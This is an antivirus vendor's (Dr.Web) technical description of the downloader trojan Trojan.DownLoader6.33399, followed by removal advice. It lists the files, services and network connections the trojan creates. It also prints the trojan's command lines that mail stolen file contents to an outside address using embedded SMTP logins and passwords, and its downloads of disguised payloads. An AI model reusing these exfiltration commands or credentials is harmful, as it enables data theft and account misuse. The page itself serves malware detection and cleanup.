Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

Trojan.DownLoader6.33399

Добавлен в вирусную базу Dr.Web: 2012-07-24

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Создает следующие сервисы:
  • [<HKLM>\SYSTEM\ControlSet001\Services\McAvscan] 'Start' = '00000002'
Вредоносные функции:
Создает и запускает на исполнение:
  • C:\MSN6Temp\TemplQ2.exe
  • C:\MSN6Temp\msmsgrs2.exe
  • C:\MSN6Temp\TemplQ.exe
  • C:\MSN6Temp\msdcom.exe -Q -AUTH LOGIN -SERVER 213.201.137.38 -PORT 35 -USER abc@komori.nl -PASS hahaha -FROM bohvmmqt4@yahoo.com -FROMNAME Mos McAffee Virus Scan L -TO bohvmmqt4@yahoo.com -PRIORITY 1 -SUBJ IJKFLL! ! -BODY -USEFILE C:\MSN6Temp\Templ.tmp
  • C:\MSN6Temp\msdcom.exe -Q -AUTH LOGIN -SERVER mail.gmx.net -PORT 587 -USER 30838315 -PASS getrich101 -FROM bohvmmqt@gmx.net -FROMNAME Mos McAffee Virus Scan -TO bohvmmqt4@yahoo.com -PRIORITY 1 -SUBJ JDJKEK! ! -BODY -USEFILE C:\MSN6Temp\Templ2.tmp
  • C:\MSN6Temp\msmsgrs.exe
  • %WINDIR%\serviceins.exe -install
  • C:\MSN6Temp\mslocalhs.exe
  • %TEMP%\ABSsetup.exe
  • %WINDIR%\McShieldOD.exe
  • %TEMP%\is-K10JU.tmp\is-JDVIK.tmp /SL4 $10110 %TEMP%\ABSsetup.exe 2219887 50688
Запускает на исполнение:
  • <SYSTEM32>\cmd.exe /c ""C:\MSN6Temp\Templ.bat" "
  • <SYSTEM32>\cmd.exe /c ""C:\MSN6Temp\Templ2.bat" "
  • <SYSTEM32>\regsvr32.exe /s C:\MSN6Temp\NTSVC.ocx
Изменения в файловой системе:
Создает следующие файлы:
  • %TEMP%\is-JJEC0.tmp\_shfoldr.dll
  • C:\MSN6Temp\Templ2.tmp
  • C:\MSN6Temp\Templ2.bat
  • C:\MSN6Temp\SS1.exe
  • %TEMP%\ABSsetup.exe
  • %TEMP%\is-K10JU.tmp\is-JDVIK.tmp
  • %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\automos[1].jpg
  • C:\MSN6Temp\Temp\autoupdate.exe
  • C:\MSN6Temp\Temp2\autoupdate.exe
  • C:\MSN6Temp\Templ.tmp
  • C:\MSN6Temp\Templ.bat
  • %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\autoupdate[1].jpg
  • %WINDIR%\McShieldOD.exe
  • C:\MSN6Temp\TemplQ3.exe
  • C:\MSN6Temp\msdcom.exe
  • C:\MSN6Temp\msmsgrs.exe
  • C:\MSN6Temp\msmsgrs2.exe
  • C:\MSN6Temp\NTSVC.ocx
  • %WINDIR%\serviceins.exe
  • C:\MSN6Temp\SS2.exe
  • C:\MSN6Temp\mslocalhs.exe
  • C:\MSN6Temp\TemplQ.exe
  • C:\MSN6Temp\TemplQ2.exe
Присваивает атрибут 'скрытый' для следующих файлов:
  • %WINDIR%\serviceins.exe
  • C:\MSN6Temp\NTSVC.ocx
  • C:\MSN6Temp\TemplQ2.exe
  • C:\MSN6Temp\SS2.exe
  • C:\MSN6Temp\Temp2\autoupdate.exe
  • C:\MSN6Temp\Temp\autoupdate.exe
  • C:\MSN6Temp\SS1.exe
  • %WINDIR%\McShieldOD.exe
  • C:\MSN6Temp\msmsgrs2.exe
  • C:\MSN6Temp\msmsgrs.exe
  • C:\MSN6Temp\TemplQ3.exe
  • C:\MSN6Temp\TemplQ.exe
  • C:\MSN6Temp\mslocalhs.exe
  • C:\MSN6Temp\msdcom.exe
Удаляет следующие файлы:
  • %TEMP%\~DFDA38.tmp
  • C:\MSN6Temp\Templ2.bat
  • %TEMP%\~DF28EF.tmp
  • C:\MSN6Temp\Templ.bat
  • C:\MSN6Temp\Templ2.tmp
  • %TEMP%\~DF21E5.tmp
  • %TEMP%\~DFBBC6.tmp
  • %TEMP%\~DF7EF4.tmp
  • %TEMP%\~DF9932.tmp
Сетевая активность:
Подключается к:
  • 'ma##.gmx.net':587
  • '21#.#01.137.38':35
  • 'www.an###fire.com':80
  • 'localhost':1035
  • 'localhost':1037
TCP:
Запросы HTTP GET:
  • www.an###fire.com/nt2/smoothie/automos.jpg
  • www.an###fire.com/nt2/smoothie/autoupdate.jpg
UDP:
  • DNS ASK ma##.gmx.net
  • DNS ASK www.an###fire.com
Другое:
Ищет следующие окна:
  • ClassName: 'Shell_TrayWnd' WindowName: ''

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке